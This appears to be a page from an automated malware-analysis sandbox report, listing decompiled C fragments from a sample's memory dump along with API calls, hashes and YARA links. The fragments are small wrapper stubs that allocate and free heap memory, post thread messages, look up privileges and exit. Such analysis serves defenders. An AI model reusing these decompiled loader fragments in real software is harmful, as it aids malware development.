0x004089b5
0x004089ba
0x004089c7
0x004088f6
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction ID: 9418915e7eeb477e5e2ec2766e2aaec59ae9dbf4e141e057a09900a59a4d4d67
Opcode Fuzzy Hash: 1efa2f8376c553138144e7bf52808227de5cb7bb2b62794fcf5c230629b4f76a
Instruction Fuzzy Hash: 8321FBB2C4420957CB15E6649E42BFF737C9B50304F04057FE989A3181FA39AB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A150( &_v67, 0, 0x3f);
				E0041AD30( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction ID: edd922925c6209f8b0e98cfad68b07b84000b97510acc14bd219e9c7142b933f
Opcode Fuzzy Hash: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction Fuzzy Hash: DB01F731A8032877E720A6959C03FFF772C5B00B55F04006EFF04BA1C2E6A8790642FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418922, Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00418922(void* __eax, void* __ecx, void* __edi, void* __esi, int _a4, long _a8, void* _a12, void* _a877535884) {
				intOrPtr _v0;
				char _t19;

				_push(__edi);
				if(__ecx + 1 == 0) {
					asm("iretd");
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					_push(__esi);
					__esi = __eax + 0xc7c;
					__eax =  *__esi;
					ExitProcess(_a4);
				}
				asm("invalid");
				_t16 = _v0;
				_push(__eax);
				_t5 = _t16 + 0xc74; // 0xc74
				E004191E0(__edi, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t19 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t19;
			}

0x00418922
0x0041892d
0x0041892f
0x00418931
0x00418933
0x00418936
0x0041893c
0x00418942
0x00418952
0x00418958
0x00418958
0x004188ee
0x004188f3
0x004188f9
0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction ID: 33714646f1d1bb2e54db7283e240e62c371420941733a65a93fdea15ca9d51fe
Opcode Fuzzy Hash: a653cd2de2404513f09ce9162d2afa26f5595cfd4e006bb174b6c19aa3b3dc8f
Instruction Fuzzy Hash: 25F085B12042097BCB18DF58CC49EEB3769BF88750F108059FD089B282DA30E941CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188E2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004188E2(void* __eax, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t18;

				asm("std");
				asm("invalid");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E004191E0(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}

0x004188ed
0x004188ee
0x004188f3
0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction ID: 2ecd89270ed87ab76e663e557be8bb9c59ba18ea85902ba56f3ef0b0c7104c8d
Opcode Fuzzy Hash: 783c375c10af107dedab5bf5bf967814157e58bc7e1e1eaaaaf508fd879477a3
Instruction Fuzzy Hash: 85E0EDBA200200BFC718DF98CC45EA77368EF88350F004549F9289B352C230E904CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a6a
0x00418a80
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418933
0x0041894a
0x00418958

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418958

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C626F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 2e149f2dc268bf2528ef8a729121f73a3ac4a3c695ce0b36424b613b1674208d
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 1EF0C2313249599BDB68EB18DDD5E6A33D5EFA4300F68C039ED59C7341D631EE408290

Uniqueness

Uniqueness Score: -1.00%

Function 00406ABE, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406ABE() {

				asm("adc ebp, [ebp+ecx*8+0x6b3aa8a4]");
				return 1;
			}

0x00406abe
0x00406ad4

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
Instruction ID: 2a283f07abafddba1a69a7c886669618796b812e570c7ba05b4463204ccdd17a
Opcode Fuzzy Hash: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
Instruction Fuzzy Hash: A3B09233B152080ADA205C4CB8412B4F3ACEB47325F2123A7EC08A72006186E4620688

Uniqueness

Uniqueness Score: -1.00%

Function 00C510D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00C50060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 00C501D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 00C51148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 00C5010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00C51930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
